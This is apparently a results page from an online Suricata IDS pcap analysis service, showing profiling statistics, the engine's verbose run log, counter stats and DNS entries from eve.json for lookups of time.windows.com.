Filename: merged.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: test-test
Runtime: 3.30460095406 seconds
Hash: 1c95dcebfd89d44f61031e49a8818557
Uploaded: 1530803406

Logfiles


packet_stats.log - (7585 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6           501            97340       75304017      25596348         12.8b   92.59
 IPv4      17            28          2774184       76271679      36648138          1.0b    7.41
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6           501            39532       12303525        151053         75.7m   66.93
TMM_FLOWWORKER              IPv4      17            28            35808        9788784        527322         14.8m   13.06
TMM_RECEIVEPCAPFILE         IPv4       6           495             2652           5508          3221          1.6m    1.41
TMM_RECEIVEPCAPFILE         IPv4      17            28             2910          13113          3466         97.1k    0.09
TMM_DECODEPCAPFILE          IPv4       6           495             2760       19296957         42060         20.8m   18.41
TMM_DECODEPCAPFILE          IPv4      17            28             2877          36333          4329        121.2k    0.11

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6           495             2946          26706          3613          1.8m  3.70  
flow                    IPv4      17            28             3096          16992          5024        140.7k  0.29  
stream                  IPv4       6           501             3069         589383         18083          9.1m  18.76 
app-layer               IPv4      17            28             2607          36678         13586        380.4k  0.79  
detect                  IPv4       6           501            19029       12258870         68535         34.3m  71.08 
detect                  IPv4      17            28            18864          69603         36237          1.0m  2.10  
tcp-prune               IPv4       6           501             2622          17292          3162          1.6m  3.28  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             1           128148         128148        128148        128.1k  46.24 
tls                     IPv4       6             2             3200           6700          4950          9.9k  3.57  
dns                     IPv4      17            14             4551          16119          9935        139.1k  50.19 
Proto detect            IPv4      17            20             2946          12585          6740        134.8k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            14            21291         513687        186164          2.6m  10.49 
LOGGER_UNIFIED2             IPv4       6            14            23040         871974         93397          1.3m  5.26  
LOGGER_JSON_ALERT           IPv4       6            14            56790         484365        215999          3.0m  12.17 
LOGGER_JSON_DNS             IPv4      17            12            38979        9644211       1063604         12.8m  51.35 
LOGGER_JSON_HTTP            IPv4       6            14            38256         530952        116771          1.6m  6.58  
LOGGER_JSON_TLS             IPv4       6             1            65655          65655         65655         65.7k  0.26  
LOGGER_JSON_FILE            IPv4       6            27            53274         500013        127837          3.5m  13.89 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
http_client_body                  IPv4       6            27             2937          23884          5885       158.9k  100.00
Total                             IPv4                    27                                          5885       158.9k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6             6             2886           3915          3229         19.4k  0.14  
PROF_DETECT_IPONLY          IPv4      17            20             2847           6615          3941         78.8k  0.58  
PROF_DETECT_RULES           IPv4       6            44             2727         163368         27037          1.2m  8.80  
PROF_DETECT_STATEFUL_START    IPv4       6            14            41934         123804         55340        774.8k  5.73  
PROF_DETECT_STATEFUL_CONT    IPv4       6            44             2814           6066          3546        156.0k  1.15  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           476             2628           8799          3001          1.4m  10.57 
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            12             2814          19593          4588         55.1k  0.41  
PROF_DETECT_PREFILTER       IPv4       6            44             8127         430383         30765          1.4m  10.02 
PROF_DETECT_PF_TX           IPv4       6            41             2778         415977         19719        808.5k  5.98  
PROF_DETECT_PF_SORT1        IPv4       6             1             2949           2949          2949          2.9k  0.02  
PROF_DETECT_PF_SORT2        IPv4       6            44             2598          11320          3113        137.0k  1.01  
PROF_DETECT_NONMPMLIST      IPv4       6            44             2811         405945         12350        543.4k  4.02  
PROF_DETECT_ALERT           IPv4       6           501             2607          11931          2988          1.5m  11.08 
PROF_DETECT_ALERT           IPv4      17            28             2820           5529          3295         92.3k  0.68  
PROF_DETECT_CLEANUP         IPv4       6           501             2637         409314          4586          2.3m  17.00 
PROF_DETECT_CLEANUP         IPv4      17            28             2613           6441          3848        107.8k  0.80  
PROF_DETECT_GETSGH          IPv4       6           501             2598        1294437          5626          2.8m  20.86 
PROF_DETECT_GETSGH          IPv4      17            28             2829           9048          5455        152.8k  1.13  


suricata-report-2018-07-05-T-15-10-10-07052018.1510-merged.pcap.txt - (10765 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /tmp/IXUyPT -l /var/www/html/1c95dcebfd89d44f61031e49a8818557140b85e9e9124dd03a3071940a2c06d1 -r /var/pcap/07052018.1510-merged.pcap -vvv -k none
elapsedtime:1.722179
stderr:
stdout:
5/7/2018 -- 15:10:08 - <Notice> - This is Suricata version 4.0.0 RELEASE
5/7/2018 -- 15:10:08 - <Info> - CPUs/cores online: 1
5/7/2018 -- 15:10:08 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 34041 and 'request-body-inspect-window' set to 16717 after randomization.
5/7/2018 -- 15:10:08 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33945 and 'response-body-inspect-window' set to 16758 after randomization.
5/7/2018 -- 15:10:08 - <Config> - DNS request flood protection level: 500
5/7/2018 -- 15:10:08 - <Config> - DNS per flow memcap (state-memcap): 524288
5/7/2018 -- 15:10:08 - <Config> - DNS global memcap: 16777216
5/7/2018 -- 15:10:08 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
5/7/2018 -- 15:10:08 - <Config> - preallocated 1000 hosts of size 136
5/7/2018 -- 15:10:08 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
5/7/2018 -- 15:10:08 - <Config> - using magic-file /usr/share/file/magic
5/7/2018 -- 15:10:08 - <Config> - Core dump size is unlimited.
5/7/2018 -- 15:10:08 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
5/7/2018 -- 15:10:08 - <Config> - preallocated 1000 defrag trackers of size 168
5/7/2018 -- 15:10:08 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
5/7/2018 -- 15:10:08 - <Config> - stream "prealloc-sessions": 2048 (per thread)
5/7/2018 -- 15:10:08 - <Config> - stream "memcap": 33554432
5/7/2018 -- 15:10:08 - <Config> - stream "midstream" session pickups: disabled
5/7/2018 -- 15:10:08 - <Config> - stream "async-oneside": disabled
5/7/2018 -- 15:10:08 - <Config> - stream "checksum-validation": disabled
5/7/2018 -- 15:10:08 - <Config> - stream."inline": disabled
5/7/2018 -- 15:10:08 - <Config> - stream "bypass": disabled
5/7/2018 -- 15:10:08 - <Config> - stream "max-synack-queued": 5
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "memcap": 134217728
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "depth": 0
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "toserver-chunk-size": 2573
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "toclient-chunk-size": 2538
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly.raw: enabled
5/7/2018 -- 15:10:08 - <Config> - stream.reassembly "segment-prealloc": 2048
5/7/2018 -- 15:10:08 - <Config> - Delayed detect disabled
5/7/2018 -- 15:10:08 - <Config> - pattern matchers: MPM: ac, SPM: bm
5/7/2018 -- 15:10:08 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
5/7/2018 -- 15:10:08 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
5/7/2018 -- 15:10:08 - <Config> - prefilter engines: MPM
5/7/2018 -- 15:10:08 - <Config> - IP reputation disabled
5/7/2018 -- 15:10:08 - <Perf> - Registered 148 keyword profiling counters.
5/7/2018 -- 15:10:08 - <Config> - Loading rule file: /tmp/tmpnRSXzF
5/7/2018 -- 15:10:08 - <Info> - 1 rule files processed. 2 rules successfully loaded, 0 rules failed
5/7/2018 -- 15:10:08 - <Info> - Threshold config parsed: 0 rule(s) found
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tcp-packet
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tcp-stream
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for udp-packet
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for other-ip
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_uri
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_request_line
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_client_body
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_response_line
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_header
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_header
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_header_names
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_header_names
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_accept
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_accept_enc
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_accept_lang
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_referer
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_connection
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_content_len
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_content_len
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_content_type
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_content_type
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_protocol
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_protocol
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_start
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_start
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_raw_header
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_raw_header
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_method
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_cookie
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_cookie
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_raw_uri
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_user_agent
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_host
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_raw_host
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_stat_msg
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_stat_code
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for dns_query
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tls_sni
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tls_cert_issuer
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tls_cert_subject
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for tls_cert_serial
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for dce_stub_data
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for dce_stub_data
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for ssh_protocol
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for ssh_protocol
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for ssh_software
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for ssh_software
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for file_data
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for file_data
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_request_line
5/7/2018 -- 15:10:08 - <Perf> - using shared mpm ctx' for http_response_line
5/7/2018 -- 15:10:08 - <Info> - 2 signatures processed. 0 are IP-only rules, 0 are inspecting packet payload, 2 inspect application layer, 0 are decoder event only
5/7/2018 -- 15:10:08 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
5/7/2018 -- 15:10:08 - <Perf> - TCP toserver: 1 port groups, 1 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - TCP toclient: 0 port groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - UDP toserver: 0 port groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - UDP toclient: 0 port groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - OTHER toserver: 0 proto groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - OTHER toclient: 0 proto groups, 0 unique SGH's, 0 copies
5/7/2018 -- 15:10:08 - <Perf> - Unique rule groups: 1
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toserver TCP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toclient TCP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toserver TCP stream": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toclient TCP stream": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toserver UDP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "toclient UDP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - Builtin MPM "other IP packet": 0
5/7/2018 -- 15:10:08 - <Perf> - AppLayer MPM "toserver http_client_body": 1
5/7/2018 -- 15:10:08 - <Perf> - Registered 2 rule profiling counters.
5/7/2018 -- 15:10:08 - <Info> - fast output device (regular) initialized: alert
5/7/2018 -- 15:10:08 - <Info> - eve-log output device (regular) initialized: eve.json
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'alert'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'http'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'dns'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'tls'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'files'
5/7/2018 -- 15:10:08 - <Config> - enabling 'eve-log' module 'ssh'
5/7/2018 -- 15:10:08 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
5/7/2018 -- 15:10:08 - <Info> - stats output device (regular) initialized: stats.log
5/7/2018 -- 15:10:08 - <Config> - AutoFP mode using "Hash" flow load balancer
5/7/2018 -- 15:10:08 - <Info> - reading pcap file /var/pcap/07052018.1510-merged.pcap
5/7/2018 -- 15:10:08 - <Config> - using 1 flow manager threads
5/7/2018 -- 15:10:08 - <Config> - using 1 flow recycler threads
5/7/2018 -- 15:10:08 - <Notice> - all 2 packet processing threads, 4 management threads initialized, engine started.
5/7/2018 -- 15:10:08 - <Info> - pcap file end of file reached (pcap err code 0)
5/7/2018 -- 15:10:08 - <Notice> - Signal Received.  Stopping engine.
5/7/2018 -- 15:10:09 - <Perf> - 0 new flows, 0 established flows were timed out, 0 flows in closed state
5/7/2018 -- 15:10:09 - <Info> - time elapsed 0.642s
5/7/2018 -- 15:10:10 - <Perf> - 17 flows processed
5/7/2018 -- 15:10:10 - <Notice> - Pcap-file module read 523 packets, 472105 bytes
5/7/2018 -- 15:10:10 - <Perf> - AutoFP - Total flow handler queues - 1
5/7/2018 -- 15:10:10 - <Info> - Alerts: 14
5/7/2018 -- 15:10:10 - <Perf> - ippair memory usage: 398144 bytes, maximum: 16777216
5/7/2018 -- 15:10:10 - <Perf> - Done dumping profiling data.
5/7/2018 -- 15:10:10 - <Perf> - host memory usage: 398144 bytes, maximum: 16777216
5/7/2018 -- 15:10:10 - <Perf> - Dumping profiling data for 2 rules.
5/7/2018 -- 15:10:10 - <Perf> - Done dumping profiling data.
5/7/2018 -- 15:10:10 - <Perf> - Done dumping keyword profiling data.
5/7/2018 -- 15:10:10 - <Info> - cleaning up signature grouping structure... complete
returncode:
0errors:
warnings:


stats.log - (3137 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
------------------------------------------------------------------------------------
Date: 7/5/2018 -- 15:10:10 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 523
decoder.bytes                              | Total                     | 472105
decoder.ipv4                               | Total                     | 523
decoder.ethernet                           | Total                     | 523
decoder.tcp                                | Total                     | 495
decoder.udp                                | Total                     | 28
decoder.avg_pkt_size                       | Total                     | 902
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 3
flow.udp                                   | Total                     | 14
tcp.sessions                               | Total                     | 3
tcp.syn                                    | Total                     | 3
tcp.synack                                 | Total                     | 3
tcp.overlap                                | Total                     | 2
detect.alert                               | Total                     | 14
app_layer.flow.http                        | Total                     | 1
app_layer.tx.http                          | Total                     | 14
app_layer.flow.tls                         | Total                     | 1
app_layer.flow.failed_tcp                  | Total                     | 1
app_layer.flow.dns_udp                     | Total                     | 6
app_layer.tx.dns_udp                       | Total                     | 6
app_layer.flow.failed_udp                  | Total                     | 8
flow_mgr.new_pruned                        | Total                     | 4
flow_mgr.est_pruned                        | Total                     | 5
flow.spare                                 | Total                     | 10005
flow_mgr.flows_checked                     | Total                     | 10
flow_mgr.flows_notimeout                   | Total                     | 5
flow_mgr.flows_timeout                     | Total                     | 5
flow_mgr.flows_removed                     | Total                     | 5
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65523
flow_mgr.rows_empty                        | Total                     | 3
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7078048


eve.json - (52961 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
{"timestamp":"2018-07-02T11:49:28.675362+0000","flow_id":6109880929826,"pcap_cnt":7,"event_type":"dns","src_ip":"192.168.95.10","src_port":62635,"dest_ip":"10.55.99.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57387,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":2087,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":153,"rdata":"52.168.138.145"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"b.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"j.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"h.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"d.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"f.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"m.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"i.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"e.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"g.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"l.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"c.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"k.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:28.679094+0000","flow_id":6109880929826,"pcap_cnt":8,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":62635,"proto":"UDP","dns":{"type":"answer","id":57387,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28032,"rdata":"a.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.184312+0000","flow_id":345723682607096,"pcap_cnt":9,"event_type":"dns","src_ip":"192.168.95.10","src_port":53459,"dest_ip":"10.55.99.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6249,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":2085,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":151,"rdata":"52.168.138.145"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"i.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"k.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"b.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"c.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"a.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"h.gtld-servers.net"}}
{"timestamp":"2018-07-02T11:49:30.185027+0000","flow_id":345723682607096,"pcap_cnt":10,"event_type":"dns","src_ip":"10.55.99.1","src_port":53,"dest_ip":"192.168.95.10","dest_port":53459,"proto":"UDP","dns":{"type":"answer","id":6249,"rcode":"NOERROR","rrname":"net","rrtype":"NS","ttl":28030,"rdata":"f.gtld-servers.net"}}
